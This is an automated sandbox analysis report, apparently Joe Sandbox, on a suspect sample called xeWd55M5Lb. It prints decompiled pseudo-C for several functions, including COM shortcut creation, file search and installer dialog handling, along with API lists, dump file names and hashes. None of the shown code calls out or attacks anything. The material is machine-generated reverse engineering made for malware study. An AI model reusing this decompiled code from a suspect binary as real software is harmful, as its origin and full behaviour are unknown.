				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29

Uniqueness

Uniqueness Score: -1.00%

Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00405038
0x00405051
0x00405056
0x0040505e
0x00405064
0x0040507a
0x0040507d
0x004052a8
0x004052af
0x004052c3
0x004052b1
0x004052b3
0x004052b6
0x004052b7
0x004052be
0x004052be
0x004052cf
0x004052dd
0x004052e0
0x004052f6
0x0040536b
0x0040536e
0x00405370
0x0040537a
0x00405388
0x00405388
0x0040538a
0x00405394
0x0040539a
0x0040539d
0x004053a0
0x004053bb
0x004053a2
0x004053ac
0x004053ac
0x004053a0
0x00405394
0x00000000
0x0040536e
0x004052fb
0x00405306
0x0040530b
0x00405312
0x00405317
0x0040531b
0x00405326
0x00405326
0x0040532a
0x0040532e
0x00405332
0x00405345
0x00405334
0x00405334
0x0040533b
0x00405341
0x0040533d
0x0040533d
0x0040533d
0x0040533b
0x00405349
0x0040534b
0x0040535e
0x00405361
0x00405364
0x00405364
0x0040532e
0x00000000
0x0040531b
0x004052fd
0x00405304
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004053be
0x004053be
0x004053c5
0x00405436
0x0040543e
0x00405446
0x00405446
0x0040544f
0x00405451
0x00405458
0x0040545b
0x0040545b
0x00405461
0x00405468
0x0040546b
0x0040546b
0x00405471
0x00405477
0x0040547d
0x0040547d
0x0040548a
0x004055eb
0x004055f2
0x0040560f
0x00405615
0x00405627
0x00405627
0x00000000
0x00405490
0x00405492
0x00405497
0x0040549c
0x004054a1
0x004054a3
0x004054a3
0x004054a4
0x004054a5
0x004054a7
0x004054a7
0x004054af
0x004054f0
0x004054f2
0x00405502
0x00405505
0x0040550a
0x00405511
0x00405514
0x004055b6
0x004055bf
0x004055c7
0x004055c7
0x004055d5
0x004055e6
0x004055e6
0x00000000
0x004055d5
0x0040551a
0x0040551d
0x00405523
0x00405528
0x0040552a
0x0040552c
0x00405532
0x00405539
0x0040553e
0x00405545
0x00405548
0x00405548
0x0040554f
0x0040555b
0x0040555f
0x00405561
0x00405561
0x00405551
0x00405553
0x00405553
0x00405581
0x0040558d
0x0040559c
0x0040559c
0x0040559e
0x004055a1
0x004055aa
0x00000000
0x004054b1
0x004054bc
0x004054bf
0x004054c4
0x004054c6
0x004054ca
0x004054da
0x004054e4
0x004054e6
0x004054e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004054cc
0x004054cc
0x004054d2
0x004054d4
0x004054d4
0x004054d5
0x004054d6
0x00000000
0x004054cc
0x004054af
0x0040548a
0x004053cd
0x00000000
0x004053e3
0x004053ed
0x004053f2
0x00000000
0x00000000
0x00405404
0x00405409
0x00405415
0x00405415
0x00405417
0x00405426
0x00405428
0x0040542c
0x0040542f
0x00000000
0x0040542f
0x004053cd
0x00405083
0x00405088
0x00405091
0x00405098
0x004050aa
0x004050b5
0x004050bb
0x004050c9
0x004050dd
0x004050e2
0x004050ef
0x004050f4
0x0040510a
0x0040511b
0x00405128
0x00405128
0x0040512b
0x00405131
0x00405133
0x00405136
0x0040513b
0x00405140
0x00405142
0x00405142
0x00405162
0x00405162
0x00405164
0x00405165
0x0040516a
0x00405170
0x00405174
0x00405179
0x00405181
0x00405185
0x0040518a
0x0040518f
0x00405197
0x0040519a
0x0040526a
0x0040527d
0x00000000
0x004051a0
0x004051a3
0x004051a6
0x004051a9
0x004051a9
0x004051af
0x004051b8
0x004051bb
0x004051bf
0x004051c2
0x004051c5
0x004051ce
0x004051d7
0x004051da
0x004051dd
0x004051e0
0x0040521e
0x00405249
0x00405220
0x0040522f
0x0040522f
0x004051e2
0x004051e5
0x004051f3
0x004051fd
0x00405205
0x0040520c
0x00405217
0x00405217
0x004051e0
0x0040524f
0x00405250
0x0040525c
0x0040525c
0x00405268
0x00405283
0x00405286
0x004052a3
0x00000000
0x00405288
0x0040528d
0x00405296
0x00405629
0x0040563b
0x0040563b
0x00405286
0x00000000
0x00405268
0x0040519a

APIs

GetDlgItem.USER32 ref: 00405049
GetDlgItem.USER32 ref: 00405054
GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
LoadImageW.USER32 ref: 004050B5
SetWindowLongW.USER32 ref: 004050CE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
DeleteObject.GDI32(00000000), ref: 0040512B
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
GetWindowLongW.USER32(?,000000F0), ref: 0040526F
SetWindowLongW.USER32 ref: 0040527D
ShowWindow.USER32(?,00000005), ref: 0040528D
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
ImageList_Destroy.COMCTL32(?), ref: 0040545B
GlobalFree.KERNEL32 ref: 0040546B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
ShowWindow.USER32(?,00000000), ref: 00405615
GetDlgItem.USER32 ref: 00405620
ShowWindow.USER32(00000000), ref: 00405627

Strings

N, xrefs: 004052C6
, xrefs: 004055FF
M, xrefs: 004051E5

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}

0x00404795
0x004048c2
0x0040491f
0x00404923
0x004049f0
0x004049f2
0x004049f2
